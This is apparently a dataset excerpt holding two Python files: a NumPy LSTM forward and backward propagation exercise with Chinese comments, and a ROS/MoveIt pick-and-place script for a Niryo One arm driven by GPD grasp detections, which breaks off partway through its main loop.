text stringlengths 38 1.54M |
|---|
import numpy as np
import rnn_utils
def lstm_cell_forward(xt, a_prev, c_prev, parameters):
"""
根据图4实现一个LSTM单元的前向传播。
参数:
xt -- 在时间步“t”输入的数据,维度为(n_x, m)
a_prev -- 上一个时间步“t-1”的隐藏状态,维度为(n_a, m)
c_prev -- 上一个时间步“t-1”的记忆状态,维度为(n_a, m)
parameters -- 字典类型的变量,包含了:
Wf -- 遗忘门的权值,维度为(n_a, n_a + n_x)
bf -- 遗忘门的偏置,维度为(n_a, 1)
Wi -- 更新门的权值,维度为(n_a, n_a + n_x)
bi -- 更新门的偏置,维度为(n_a, 1)
Wc -- 第一个“tanh”的权值,维度为(n_a, n_a + n_x)
bc -- 第一个“tanh”的偏置,维度为(n_a, n_a + n_x)
Wo -- 输出门的权值,维度为(n_a, n_a + n_x)
bo -- 输出门的偏置,维度为(n_a, 1)
Wy -- 隐藏状态与输出相关的权值,维度为(n_y, n_a)
by -- 隐藏状态与输出相关的偏置,维度为(n_y, 1)
返回:
a_next -- 下一个隐藏状态,维度为(n_a, m)
c_next -- 下一个记忆状态,维度为(n_a, m)
yt_pred -- 在时间步“t”的预测,维度为(n_y, m)
cache -- 包含了反向传播所需要的参数,包含了(a_next, c_next, a_prev, c_prev, xt, parameters)
"""
# 从“parameters”中获取相关值
Wf = parameters["Wf"]
bf = parameters["bf"]
Wi = parameters["Wi"]
bi = parameters["bi"]
Wc = parameters["Wc"]
bc = parameters["bc"]
Wo = parameters["Wo"]
bo = parameters["bo"]
Wy = parameters["Wy"]
by = parameters["by"]
contact = np.vstack((a_prev,xt))
#遗忘门
Gf = rnn_utils.sigmoid(np.dot(Wf,contact)+bf)
#更新门
Gi = rnn_utils.sigmoid(np.dot(Wi,contact)+bi)
#输出门
Go = rnn_utils.sigmoid(np.dot(Wo,contact)+bo)
# 更新单元
tmp_ct = np.tanh(np.dot(Wc,contact)+bc)
# 更新单元
ct = np.multiply(Gi,tmp_ct) + np.multiply(Gf,c_prev)
#输出
a_next = np.multiply(Go,np.tanh(ct))
#计算LSTM单元的预测值
y_pre = rnn_utils.softmax(np.dot(Wy, a_next) + by)
cache = (a_next, ct, a_prev, c_prev,Gf, Gi, tmp_ct, Go, xt, parameters)
return a_next,ct,y_pre,cache
def lstm_forward(x, a0, parameters):
"""
实现LSTM单元组成的的循环神经网络
参数:
x -- 所有时间步的输入数据,维度为(n_x, m, T_x)
a0 -- 初始化隐藏状态,维度为(n_a, m)
parameters -- python字典,包含了以下参数:
Wf -- 遗忘门的权值,维度为(n_a, n_a + n_x)
bf -- 遗忘门的偏置,维度为(n_a, 1)
Wi -- 更新门的权值,维度为(n_a, n_a + n_x)
bi -- 更新门的偏置,维度为(n_a, 1)
Wc -- 第一个“tanh”的权值,维度为(n_a, n_a + n_x)
bc -- 第一个“tanh”的偏置,维度为(n_a, n_a + n_x)
Wo -- 输出门的权值,维度为(n_a, n_a + n_x)
bo -- 输出门的偏置,维度为(n_a, 1)
Wy -- 隐藏状态与输出相关的权值,维度为(n_y, n_a)
by -- 隐藏状态与输出相关的偏置,维度为(n_y, 1)
返回:
a -- 所有时间步的隐藏状态,维度为(n_a, m, T_x)
y -- 所有时间步的预测值,维度为(n_y, m, T_x)
caches -- 为反向传播的保存的元组,维度为(【列表类型】cache, x))
"""
caches = []
n_x,m,n_T = x.shape
n_y, n_a = parameters["Wy"].shape
a = np.zeros([n_a,m,n_T])
c = np.zeros([n_a,m,n_T])
y_pres = np.zeros([n_y,m,n_T])
a_next = a0
c_next = np.zeros([n_a, m])
for i in range(n_T):
a_next, c_next, y_pre, cache = lstm_cell_forward(x[...,i], a_next, c_next, parameters)
a[...,i] = a_next
c[..., i] = c_next
y_pres[...,i] = y_pre
caches.append(cache)
caches = (caches, x)
return a,y_pres,c,caches
def lstm_cell_backward(da_next, dc_next, cache):
"""
实现LSTM的单步反向传播
参数:
da_next -- 下一个隐藏状态的梯度,维度为(n_a, m)
dc_next -- 下一个单元状态的梯度,维度为(n_a, m)
cache -- 来自前向传播的一些参数
返回:
gradients -- 包含了梯度信息的字典:
dxt -- 输入数据的梯度,维度为(n_x, m)
da_prev -- 先前的隐藏状态的梯度,维度为(n_a, m)
dc_prev -- 前的记忆状态的梯度,维度为(n_a, m, T_x)
dWf -- 遗忘门的权值的梯度,维度为(n_a, n_a + n_x)
dbf -- 遗忘门的偏置的梯度,维度为(n_a, 1)
dWi -- 更新门的权值的梯度,维度为(n_a, n_a + n_x)
dbi -- 更新门的偏置的梯度,维度为(n_a, 1)
dWc -- 第一个“tanh”的权值的梯度,维度为(n_a, n_a + n_x)
dbc -- 第一个“tanh”的偏置的梯度,维度为(n_a, n_a + n_x)
dWo -- 输出门的权值的梯度,维度为(n_a, n_a + n_x)
dbo -- 输出门的偏置的梯度,维度为(n_a, 1)
"""
# 从cache中获取信息
(a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters) = cache
# 获取xt与a_next的维度信息
n_x, m = xt.shape
n_a, m = a_next.shape
#输出门的偏导数 因为dot和at以及Y有关。
dot = da_next*np.tanh(c_next)*ot*(1-ot)
#临时C的偏导数
dcct = (dc_next * it + ot * (1 - np.square(np.tanh(c_next))) * it * da_next) * (1 - np.square(cct))
#更新门的偏导数
dit = (dc_next * cct + ot * (1 - np.square(np.tanh(c_next))) * cct * da_next) * it * (1 - it)
#遗忘门的偏导数
dft = (da_next*ot*(1-np.square(np.tanh(c_next)))+dc_next)*c_prev*ft*(1-ft)
#计算权重更新
contact = np.vstack((a_prev, xt))
dWf = np.dot(dft,contact.T)
dWi = np.dot(dit,contact.T)
dWc = np.dot(dcct,contact.T)
dWo = np.dot(dot,contact.T)
dbf = np.sum(dft,axis=1,keepdims=True)
dbi = np.sum(dit, axis=1, keepdims=True)
dbc = np.sum(dcct, axis=1, keepdims=True)
dbo = np.sum(dot, axis=1, keepdims=True)
#计算先前隐藏状态、先前记忆状态和输入的倒数
da_prev = np.dot(parameters["Wf"][:, :n_a].T, dft) + np.dot(parameters["Wc"][:, :n_a].T, dcct) + np.dot(
parameters["Wi"][:, :n_a].T, dit) + np.dot(parameters["Wo"][:, :n_a].T, dot)
dc_prev = dc_next * ft + ot * (1 - np.square(np.tanh(c_next))) * ft * da_next
dxt = np.dot(parameters["Wf"][:, n_a:].T, dft) + np.dot(parameters["Wc"][:, n_a:].T, dcct) + np.dot(
parameters["Wi"][:, n_a:].T, dit) + np.dot(parameters["Wo"][:, n_a:].T, dot)
# 保存梯度信息到字典
gradients = {"dxt": dxt, "da_prev": da_prev, "dc_prev": dc_prev, "dWf": dWf, "dbf": dbf, "dWi": dWi, "dbi": dbi,
"dWc": dWc, "dbc": dbc, "dWo": dWo, "dbo": dbo}
return gradients
def lstm_backward(da, caches):
"""
实现LSTM网络的反向传播
参数:
da -- 关于隐藏状态的梯度,维度为(n_a, m, T_x)
cachses -- 前向传播保存的信息
返回:
gradients -- 包含了梯度信息的字典:
dx -- 输入数据的梯度,维度为(n_x, m,T_x)
da0 -- 先前的隐藏状态的梯度,维度为(n_a, m)
dWf -- 遗忘门的权值的梯度,维度为(n_a, n_a + n_x)
dbf -- 遗忘门的偏置的梯度,维度为(n_a, 1)
dWi -- 更新门的权值的梯度,维度为(n_a, n_a + n_x)
dbi -- 更新门的偏置的梯度,维度为(n_a, 1)
dWc -- 第一个“tanh”的权值的梯度,维度为(n_a, n_a + n_x)
dbc -- 第一个“tanh”的偏置的梯度,维度为(n_a, n_a + n_x)
dWo -- 输出门的权值的梯度,维度为(n_a, n_a + n_x)
dbo -- 输出门的偏置的梯度,维度为(n_a, 1)
"""
# 从caches中获取第一个cache(t=1)的值
caches, x = caches
(a1, c1, a0, c0, f1, i1, cc1, o1, x1, parameters) = caches[0]
# 获取da与x1的维度信息
n_a, m, T_x = da.shape
n_x, m = x1.shape
# 初始化梯度
dx = np.zeros([n_x, m, T_x])
da0 = np.zeros([n_a, m])
da_prevt = np.zeros([n_a, m])
dc_prevt = np.zeros([n_a, m])
dWf = np.zeros([n_a, n_a + n_x])
dWi = np.zeros([n_a, n_a + n_x])
dWc = np.zeros([n_a, n_a + n_x])
dWo = np.zeros([n_a, n_a + n_x])
dbf = np.zeros([n_a, 1])
dbi = np.zeros([n_a, 1])
dbc = np.zeros([n_a, 1])
dbo = np.zeros([n_a, 1])
for i in reversed(range(T_x)):
gradients = lstm_cell_backward(da[...,i],dc_prevt,caches[i])
dx[...,i] = gradients["dxt"]
dWf = dWf + gradients['dWf']
dWi = dWi + gradients['dWi']
dWc = dWc + gradients['dWc']
dWo = dWo + gradients['dWo']
dbf = dbf + gradients['dbf']
dbi = dbi + gradients['dbi']
dbc = dbc + gradients['dbc']
dbo = dbo + gradients['dbo']
dc_prevt = gradients["dc_prev"]
da0 = gradients['da_prev']
gradients = {"dx": dx, "da0": da0, "dWf": dWf, "dbf": dbf, "dWi": dWi, "dbi": dbi,
"dWc": dWc, "dbc": dbc, "dWo": dWo, "dbo": dbo}
return gradients
if __name__ == '__main__':
np.random.seed(1)
x = np.random.randn(3, 10, 7)
a0 = np.random.randn(5, 10)
Wf = np.random.randn(5, 5 + 3)
bf = np.random.randn(5, 1)
Wi = np.random.randn(5, 5 + 3)
bi = np.random.randn(5, 1)
Wo = np.random.randn(5, 5 + 3)
bo = np.random.randn(5, 1)
Wc = np.random.randn(5, 5 + 3)
bc = np.random.randn(5, 1)
Wy = np.random.randn(1,5)
by = np.random.randn(1, 1)
parameters = {"Wf": Wf, "Wi": Wi, "Wo": Wo, "Wc": Wc, "Wy": Wy, "bf": bf, "bi": bi, "bo": bo, "bc": bc, "by": by}
a, y, c, caches = lstm_forward(x, a0, parameters)
da = np.random.randn(5, 10, 4)
gradients = lstm_backward(da, caches)
print("gradients[\"dx\"][1][2] =", gradients["dx"][1][2])
print("gradients[\"dx\"].shape =", gradients["dx"].shape)
print("gradients[\"da0\"][2][3] =", gradients["da0"][2][3])
print("gradients[\"da0\"].shape =", gradients["da0"].shape)
print("gradients[\"dWf\"][3][1] =", gradients["dWf"][3][1])
print("gradients[\"dWf\"].shape =", gradients["dWf"].shape)
print("gradients[\"dWi\"][1][2] =", gradients["dWi"][1][2])
print("gradients[\"dWi\"].shape =", gradients["dWi"].shape)
print("gradients[\"dWc\"][3][1] =", gradients["dWc"][3][1])
print("gradients[\"dWc\"].shape =", gradients["dWc"].shape)
print("gradients[\"dWo\"][1][2] =", gradients["dWo"][1][2])
print("gradients[\"dWo\"].shape =", gradients["dWo"].shape)
print("gradients[\"dbf\"][4] =", gradients["dbf"][4])
print("gradients[\"dbf\"].shape =", gradients["dbf"].shape)
print("gradients[\"dbi\"][4] =", gradients["dbi"][4])
print("gradients[\"dbi\"].shape =", gradients["dbi"].shape)
print("gradients[\"dbc\"][4] =", gradients["dbc"][4])
print("gradients[\"dbc\"].shape =", gradients["dbc"].shape)
print("gradients[\"dbo\"][4] =", gradients["dbo"][4])
print("gradients[\"dbo\"].shape =", gradients["dbo"].shape)
|
#!/usr/bin/env python3
import rospy
import numpy as np
import copy
import tf
import tf2_ros
import yaml
import datetime
import gc
from tools import *
from pprint import pprint
from pyquaternion import Quaternion
from gpd.msg import GraspConfigList
from moveit_python import *
from moveit_msgs.msg import Grasp, PlaceLocation
import geometry_msgs.msg
from geometry_msgs.msg import PoseStamped, Vector3, Pose, TransformStamped, PointStamped
from trajectory_msgs.msg import JointTrajectoryPoint
from visualization_msgs.msg import Marker
from std_msgs.msg import Header, ColorRGBA, String
import sensor_msgs.msg #import PointCloud2
from gpd_controller import GpdGrasps
from robot_controller import RobotPreparation
from moveit_python.geometry import rotate_pose_msg_by_euler_angles
from tf.transformations import *
from filter_pointcloud_client import call_pointcloud_filter_service
from rosnode import get_node_names, kill_nodes
from pointcloud_operations import create_mesh_and_save
from sensor_msgs import point_cloud2
#import geometry_msgs.msg #for pose2 simple
import math
#from tools import *
#from pprint import pprint
#from pyquaternion import Quaternion
#from gpd.msg import GraspConfigList
#from moveit_python import *
#from moveit_msgs.msg import Grasp, PlaceLocation
#from geometry_msgs.msg import PoseStamped, Vector3, Pose
#from trajectory_msgs.msg import JointTrajectoryPoint
#from visualization_msgs.msg import Marker
#from std_msgs.msg import Header, ColorRGBA
#from moveit_python.geometry import rotate_pose_msg_by_euler_angles
import sys
import moveit_commander
#import moveit_msgs.msg
#import geometry_msgs.msg
#from math import pi
#from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from tf.msg import tfMessage
from niryo_one_python_api.niryo_one_api import *
import time
#import yaml
import subprocess
class GpdPickPlace(object):
grasps = []
mark_pose = False
#grasp_offset = 0
grasp_offset = -0.03
#grasp_offset = -0.05
def __init__(self, mark_pose=False):
self.grasp_subscriber = rospy.Subscriber("/detect_grasps/clustered_grasps", GraspConfigList,
self.grasp_callback)
if mark_pose:
self.mark_pose = True
self.marker_publisher = rospy.Publisher('visualization_marker', Marker, queue_size=5)
#self.marker_publisher = rospy.Publisher('visualization_marker', Marker)
self.p = PickPlaceInterface(group="arm", ee_group="tool", verbose=True)
self.planning = PlanningSceneInterface("camera_color_optical_frame")
#self.tfBuffer = tf2_ros.Buffer()
#self.listener = tf2_ros.TransformListener(self.tfBuffer)
#self.transformer = tf2_ros.BufferInterface()
self.tf = tf.TransformListener()
self.br = tf.TransformBroadcaster()
#self.bcaster = tf2_ros.StaticTransformBroadcaster()
#self.transformer = tf.TransformerROS(cache_time = rospy.Duration(10.0))
#time.sleep(3)
def grasp_callback(self, msg):
self.grasps = msg.grasps
self.grasp_subscriber.unregister()
# frame_id = msg.header.frame_id
pevent("Received new grasps")
def show_grasp_pose(self, publisher, grasp_pose):
# pinfo("Marker orientation:")
# pprint(grasp_pose.orientation)
marker = Marker(
type=Marker.ARROW,
id=0,
lifetime=rospy.Duration(30),
pose=grasp_pose,
scale=Vector3(0.03, 0.02, 0.02),
header=Header(frame_id='camera_color_optical_frame'),
color=ColorRGBA(1.0, 1.0, 0.0, 0.8))
publisher.publish(marker)
#def show_grasp_pose(self, publisher, grasp_pose):
# place_marker_at_pose(publisher, grasp_pose)
def place_marker_at_pose(self, publisher, poseStamped):
marker_x = Marker(
type=Marker.ARROW,
id=0,
lifetime=rospy.Duration(60),
pose=poseStamped.pose,
scale=Vector3(0.1, 0.01, 0.01),
header=poseStamped.header,
color=ColorRGBA(1.0, 0.0, 0.0, 0.8))
publisher.publish(marker_x)
def get_gpd_grasps(self):
pevent("Waiting for grasps to arrive")
while len(self.grasps) == 0:
rospy.sleep(0.01)
return self.grasps
def generate_grasp_msgs(self, grasps):
formatted_grasps = []
for i in range(0, len(grasps)):
g = Grasp()
g.id = "dupa_" + str(i)
gp = PoseStamped()
gp.header.frame_id = "camera_color_optical_frame"
org_q = self.trans_matrix_to_quaternion(grasps[i])
# rot_q = Quaternion(0.7071, 0.7071, 0, 0) # 90* around X axis (W, X, Y, Z)
# quat = rot_q * org_q
quat = org_q
# Move grasp back for given offset
gp.pose.position.x = grasps[i].surface.x + self.grasp_offset * grasps[i].approach.x
gp.pose.position.y = grasps[i].surface.y + self.grasp_offset * grasps[i].approach.y
gp.pose.position.z = grasps[i].surface.z + self.grasp_offset * grasps[i].approach.z
#why this like Lukasz?
gp.pose.orientation.x = float(quat.elements[1])
gp.pose.orientation.y = float(quat.elements[2])
gp.pose.orientation.z = float(quat.elements[3])
gp.pose.orientation.w = float(quat.elements[0])
#pprint(gp.pose.orientation)
g.grasp_pose = gp
g.pre_grasp_approach.direction.header.frame_id = "tool_link"
g.pre_grasp_approach.direction.vector.x = 1.0
g.pre_grasp_approach.direction.vector.y = 0.0
g.pre_grasp_approach.direction.vector.z = 0.0
g.pre_grasp_approach.min_distance = 0.04
g.pre_grasp_approach.desired_distance = 0.08
# g.pre_grasp_posture.joint_names = ["joint_6"]
# g.pre_grasp_posture.header.frame_id = "hand_link"
# pos = JointTrajectoryPoint()
# pos.positions.append(0)
# pos.positions.append(0.1337)
# g.pre_grasp_posture.points.append(pos)
# g.grasp_posture.joint_names = ["gripper_right_finger_joint", "gripper_left_finger_joint"]
# g.grasp_posture.joint_names = ["joint_6"]
# pos = JointTrajectoryPoint()
# pos.positions.append(0.0)
# pos.positions.append(0.0)
# pos.accelerations.append(0.0)
# pos.accelerations.append(0.0)
# g.grasp_posture.points.append(pos)
# g.grasp_posture.header.frame_id = "hand_link"
#g.allowed_touch_objects = ["<octomap>", "obj"]
g.allowed_touch_objects = ["obj"]
g.max_contact_force = 0.0
#g.grasp_quality = grasps[0].score.data perche 0 e non i????
g.grasp_quality = grasps[i].score.data
#Create virtual link so I can get the transform from the gripper_link to grasp pose
# transform_msg = geometry_msgs.msg.TransformStamped()
# transform_msg.header.frame_id = "camera_color_optical_frame"
# transform_msg.child_frame_id = "virtual_frame"
# transform_msg.transform.translation.x = g.grasp_pose.pose.position.x
# transform_msg.transform.translation.y = g.grasp_pose.pose.position.y
# transform_msg.transform.translation.z = g.grasp_pose.pose.position.z
# transform_msg.transform.rotation.x = g.grasp_pose.pose.orientation.x
# transform_msg.transform.rotation.y = g.grasp_pose.pose.orientation.y
# transform_msg.transform.rotation.z = g.grasp_pose.pose.orientation.z
# transform_msg.transform.rotation.w = g.grasp_pose.pose.orientation.w
# self.bcaster.sendTransform(transform_msg)
# time.sleep(1)
# #t = self.tf.getLatestCommonTime("virtual_frame", "gripper_link")
# t = rospy.Time(0)
# self.tf.waitForTransform("gripper_link", "virtual_frame", t, rospy.Duration(4.0))
# (v_trans, v_rot) = self.tf.lookupTransformFull("gripper_link", t, "virtual_frame", t, "base_link")
# #t = self.tf.getLatestCommonTime("tool_link", "base_link")
# self.tf.waitForTransform("base_link", "tool_link", t, rospy.Duration(4.0))
# (tool_trans, tool_rot) = self.tf.lookupTransformFull("base_link",t, "tool_link", t, "base_link")
# pprint((v_trans, tool_trans))
# #Update the grasp message, tool_link and gripper have the same orientation
# g.grasp_pose.pose.position.x = tool_trans[0] + v_trans[0]
# g.grasp_pose.pose.position.y = tool_trans[1] + v_trans[1]
# g.grasp_pose.pose.position.z = tool_trans[2] + v_trans[2]
# gp.header.frame_id = "base_link"
#t = rospy.Time(0)
#grasp_point = geometry_msgs.msg.PointStamped()
#grasp_point.header.frame_id = "camera_color_optical_frame"
#grasp_point.point = g.grasp_pose.pose.position
#Get grasp point in base_link coordinate system
#t = self.tf.getLatestCommonTime("camera_color_optical_frame", "base_link")
#print(t)
#self.tf.waitForTransform("camera_color_optical_frame", "base_link", t, rospy.Duration(4.0))
#grasp_base = self.transformer.TransformPose("base_link", grasp_point)
#grasp_base = self.transformer.transform(grasp_point, "base_link", timeout=rospy.Duration(4.0))
grasp_base = self.tf.transformPose("base_link", g.grasp_pose)
# #Get tool and gripper translations from base_link
# #self.tf.waitForTransform("base_link", "tool_link", rospy.Duration(4.0))
# tool_trans, _ = self.tf.lookupTransform("base_link", "tool_link", rospy.Time(0))
# gripper_trans, _ = self.tf.lookupTransform("base_link", "gripper_link", rospy.Time(0))
# g.grasp_pose.header.frame_id = "base_link"
# g.grasp_pose.pose.position.x = tool_trans[0] + grasp_base.pose.position.x - gripper_trans[0]
# g.grasp_pose.pose.position.y = tool_trans[1] + grasp_base.pose.position.y - gripper_trans[1]
# g.grasp_pose.pose.position.z = tool_trans[2] + grasp_base.pose.position.z - gripper_trans[2]
# g.grasp_pose.pose.orientation.x = grasp_base.pose.orientation.x
# g.grasp_pose.pose.orientation.y = grasp_base.pose.orientation.y
# g.grasp_pose.pose.orientation.z = grasp_base.pose.orientation.z
# g.grasp_pose.pose.orientation.w = grasp_base.pose.orientation.w
#pprint(g.grasp_pose)
# q = Quaternion(g.grasp_pose.pose.orientation.w,
# g.grasp_pose.pose.orientation.x,
# g.grasp_pose.pose.orientation.y,
# g.grasp_pose.pose.orientation.z)
# (x_axis, z_axis) = (q.rotate([1.0, 0.0, 0.0]),
# q.rotate([0.0, 0.0, 1.0]))
# g.grasp_pose.header.frame_id = "base_link"
# g.grasp_pose.pose.position.x = grasp_base.pose.position.x - 0.025 * x_axis[0] + 0.015 * z_axis[0]
# g.grasp_pose.pose.position.y = grasp_base.pose.position.y - 0.025 * x_axis[1] + 0.015 * z_axis[1]
# g.grasp_pose.pose.position.z = grasp_base.pose.position.z - 0.025 * x_axis[2] + 0.015 * z_axis[2]
# g.grasp_pose.pose.orientation.x = grasp_base.pose.orientation.x
# g.grasp_pose.pose.orientation.y = grasp_base.pose.orientation.y
# g.grasp_pose.pose.orientation.z = grasp_base.pose.orientation.z
# g.grasp_pose.pose.orientation.w = grasp_base.pose.orientation.w
t = rospy.Time.now()
self.br.sendTransform((grasp_base.pose.position.x, grasp_base.pose.position.y, grasp_base.pose.position.z),
(grasp_base.pose.orientation.x, grasp_base.pose.orientation.y, grasp_base.pose.orientation.z, grasp_base.pose.orientation.w),
t, "grasp_frame", "base_link")
self.br.sendTransform((-0.025, 0.0, 0.015), (0, 0, 0, 1), t, "virtual_tool", "grasp_frame")
tool_pose = geometry_msgs.msg.PoseStamped()
tool_pose.header.frame_id = "virtual_tool"
tool_pose.pose.orientation.w = 1.0
self.tf.waitForTransform("base_link", "virtual_tool", t, rospy.Duration(4.0))
g.grasp_pose.header.frame_id = "base_link"
g.grasp_pose = self.tf.transformPose("base_link", tool_pose)
formatted_grasps.append(g)
return formatted_grasps
def trans_matrix_to_quaternion(self, grasp):
r = np.array([[grasp.approach.x, grasp.binormal.x, grasp.axis.x],
[grasp.approach.y, grasp.binormal.y, grasp.axis.y],
[grasp.approach.z, grasp.binormal.z, grasp.axis.z]])
return Quaternion(matrix=r)
def pick(self, grasps_list, verbose=False):
failed_grasps = 0
pevent("Pick sequence started")
# Add object mesh to planning scene
self.add_object_mesh()
#t = self.tf.getLatestCommonTime("base_link", "camera_depth_optical_frame")
for single_grasp in grasps_list:
if self.mark_pose:
self.show_grasp_pose(self.marker_publisher, single_grasp.grasp_pose.pose)
rospy.sleep(1)
#single_grasp.grasp_pose = self.tf.transformPose("base_link", single_grasp.grasp_pose)
if verbose:
pevent("Executing grasp: ")
pprint(single_grasp.grasp_pose)
self.place_marker_at_pose(self.marker_publisher, single_grasp.grasp_pose)
pick_result = self.p.pickup("obj", [single_grasp, ], planning_time=9001, support_name="<octomap>",
allow_gripper_support_collision=True)
pevent("Planner returned: " + get_moveit_error_code(pick_result.error_code.val))
if pick_result.error_code.val == 1:
pevent("Grasp successful!")
return single_grasp
else:
failed_grasps += 1
if failed_grasps == 5:
pevent("All grasps failed. Aborting")
exit(1)
def place2(self, place_msg, niryo):
pevent("Place sequence started")
group_name = "arm"
group = moveit_commander.MoveGroupCommander(group_name)
p2 = copy.deepcopy(place_msg.grasp_pose.pose)
p2.position.z = 0.3
group.set_pose_target(p2)
plan = group.go(wait=True)
group.stop()
group.clear_pose_targets()
p3 = copy.deepcopy(place_msg.grasp_pose.pose)
p3.position.y = -place_msg.grasp_pose.pose.position.y
p3.position.z = 0.3
group.set_pose_target(p3)
plan = group.go(wait=True)
group.stop()
group.clear_pose_targets()
p4 = copy.deepcopy(place_msg.grasp_pose.pose)
p4.position.y = -place_msg.grasp_pose.pose.position.y
group.set_pose_target(p4)
# The go command can be called with joint values, poses, or without any
# parameters if you have already set the pose or joint target for the group
# group.go(joint_goal, wait=True)
plan = group.go(wait=True)
# Calling `stop()` ensures that there is no residual movement
group.stop()
group.clear_pose_targets()
niryo.open_gripper(TOOL_GRIPPER_3_ID, 200)
print("Gripper 2 opened")
p5 = copy.deepcopy(place_msg.grasp_pose.pose)
p5.position.y = -place_msg.grasp_pose.pose.position.y
p5.position.z = 0.3
group.set_pose_target(p5)
plan = group.go(wait=True)
group.stop()
group.clear_pose_targets()
# p6 = Pose()
# p6.position.x = 0.065
# p6.position.y = 0.0
# p6.position.z = 0.207
# p6.orientation.x = 0.0
# p6.orientation.y = 0.007
# p6.orientation.z = 0.0
# p6.orientation.w = 1.0
# group.set_pose_target(p6)
# plan = group.go(wait=True)
# group.stop()
# group.clear_pose_targets()
def return_to_rest(self, place_msg):
pevent("Returning to resting position")
group_name = "arm"
group = moveit_commander.MoveGroupCommander(group_name)
p1 = copy.deepcopy(place_msg.grasp_pose.pose)
p1.position.y = -place_msg.grasp_pose.pose.position.y
p1.position.z = 0.3
group.set_pose_target(p1)
plan = group.go(wait=True)
group.stop()
group.clear_pose_targets()
p2 = Pose()
p2.position.x = 0.065
p2.position.y = 0.0
p2.position.z = 0.207
p2.orientation.x = 0.0
p2.orientation.y = 0.007
p2.orientation.z = 0.0
p2.orientation.w = 1.0
group.set_pose_target(p2)
plan = group.go(wait=True)
group.stop()
group.clear_pose_targets()
def place(self, place_msg):
pevent("Place sequence started")
#places = self.generate_place_poses(place_pose)
#place_pose is a Grasp msg
l = PlaceLocation()
l.id = "place target"
l.place_pose = place_msg.grasp_pose
l.place_pose.pose.position.y = -l.place_pose.pose.position.y
_, place_result = self.p.place_with_retry("obj", [l, ], support_name="<octomap>", planning_time=9001,
goal_is_eef=True)
pevent("Planner returned: " + get_moveit_error_code(place_result.error_code.val))
#Keep getting INVALID_GROUP_NAME - why???
#Does pick kill the planning group?
def generate_place_poses(self, initial_place_pose):
places = list()
l = PlaceLocation()
l.id = "dupadupa"
l.place_pose.header.frame_id = "camera_color_optical_frame"
q = Quaternion(initial_place_pose.grasp_pose.pose.orientation.w,
initial_place_pose.grasp_pose.pose.orientation.x,
initial_place_pose.grasp_pose.pose.orientation.y,
initial_place_pose.grasp_pose.pose.orientation.z)
# Load successful grasp pose
l.place_pose.pose.position = initial_place_pose.grasp_pose.pose.position
l.place_pose.pose.orientation.w = q.elements[0]
l.place_pose.pose.orientation.x = q.elements[1]
l.place_pose.pose.orientation.y = q.elements[2]
l.place_pose.pose.orientation.z = q.elements[3]
# Move 20cm to the right
l.place_pose.pose.position.y += 0.2
# Fill rest of the msg with some data
l.post_place_posture = initial_place_pose.grasp_posture
l.post_place_retreat = initial_place_pose.post_grasp_retreat
l.pre_place_approach = initial_place_pose.pre_grasp_approach
places.append(copy.deepcopy(l))
# Rotate place pose to generate more possible configurations for the planner
m = 16 # Number of possible place poses
for i in range(0, m - 1):
l.place_pose.pose = rotate_pose_msg_by_euler_angles(l.place_pose.pose, 0, 0, 2 * math.pi / m)
places.append(copy.deepcopy(l))
return places
def add_object_mesh(self):
obj_pose = Pose()
obj_pose.position.x = 0
obj_pose.position.y = 0
obj_pose.position.z = 0
obj_pose.orientation.x = 0
obj_pose.orientation.y = 0
obj_pose.orientation.z = 0
obj_pose.orientation.w = 1
self.planning.addMesh("obj", obj_pose, "object.stl", use_service = True)
# p = Pose()
# p.position.x = 0
# p.position.y = 0
# p.position.z = 0
# p.orientation.x = 0
# p.orientation.y = 0
# p.orientation.z = 0
# p.orientation.w = 1
# planning.add_box("table", p, (1, 1, 1))
#t = rospy.Time.now()
#self.tf.waitForTransform("ground_link", "camera_color_optical_frame", t, rospy.Duration(4.0))
#(trans, quat) = self.tf.lookupTransform("camera_color_optical_frame", "ground_link", t)
self.planning.attachBox("table", 1, 1, 1, 0, 0, -0.5, link_name="ground_link")
#time.sleep(15)
#planning.clear()
# rospy.sleep(3.14)
# pprint(planning.getKnownCollisionObjects())
def get_know_successful_grasp(self):
g = Grasp()
g.id = "successful_predefined_grasp"
gp = PoseStamped()
gp.header.frame_id = "camera_color_optical_frame"
gp.pose.position.x = 0.183518647951
gp.pose.position.y = -0.23707952283
gp.pose.position.z = 0.493978534979
gp.pose.orientation.w = -0.604815599864
gp.pose.orientation.x = -0.132654186819
gp.pose.orientation.y = 0.698958888788
gp.pose.orientation.z = -0.357851126398
g.grasp_pose = gp
return g
def wait_for_mesh_and_save(self):
pinfo("Subscribing to pointcloud to generate mesh")
self.obj_pc_subscriber = rospy.Subscriber("/cloud_indexed_pc_only", sensor_msgs.msg.PointCloud2 , self.obj_pointcloud_callback)
def obj_pointcloud_callback(self, msg): #msg is a sensor_msgs.msg.PointCloud2
# pcl::toROSMsg
pinfo("Pointcloud received")
cloud = []
for p in point_cloud2.read_points(msg, skip_nans=True):
cloud.append([p[0], p[1], p[2]])
create_mesh_and_save(cloud)
pinfo("Mesh generated")
self.obj_pc_subscriber.unregister()
if __name__ == "__main__":
start_time = datetime.datetime.now()
rospy.init_node("gpd_pick_and_place")
print("--- Start Physical Arm ---")
n = NiryoOne()
# print("Calibration started !")
# Calibrate robot first
#try:
# n.calibrate_auto()
#except NiryoOneException as e:
# print e
print("Make sure calibration is already performed on arm !")
time.sleep(1)
# Test learning mode
n.activate_learning_mode(False)
# Test gripper 3
n.change_tool(TOOL_GRIPPER_3_ID)
# testing to add a box at the eef to simulate a gripper
# robot = moveit_commander.RobotCommander()
# scene = moveit_commander.PlanningSceneInterface()
# group_name = "arm"
# group = moveit_commander.MoveGroupCommander(group_name)
# We can get the name of the reference frame for this robot:
# planning_frame = group.get_planning_frame()
# print("============ Reference frame: %s" % planning_frame)
# We can also print the name of the end-effector link for this group:
# eef_link = group.get_end_effector_link()
# print("============ End effector: %s" % eef_link)
# We can get a list of all the groups in the robot:
# group_names = robot.get_group_names()
# print("============ Robot Groups:", robot.get_group_names())
# Sometimes for debugging it is useful to print the entire state of the
# robot:
# print("============ Printing robot state")
# print(robot.get_current_state())
# print("")
#Read camera-to-ground transform from yaml file and publish
# with open('camera_params.yaml', 'r') as infile:
# cam_pose = yaml.load(infile)
# camera_static_transform = subprocess.Popen(
# ["rosrun", "tf", "static_transform_publisher", str(cam_pose[0]), str(cam_pose[1]), str(cam_pose[2]),
# str(cam_pose[3]), str(cam_pose[4]), str(cam_pose[5]), str(cam_pose[6]), "camera_color_optical_frame", "ground_link", "100"])
# print("[INFO] Camera-robot link established")
num_objects = 1
for i in range (0, num_objects):
# Subscribe for grasps
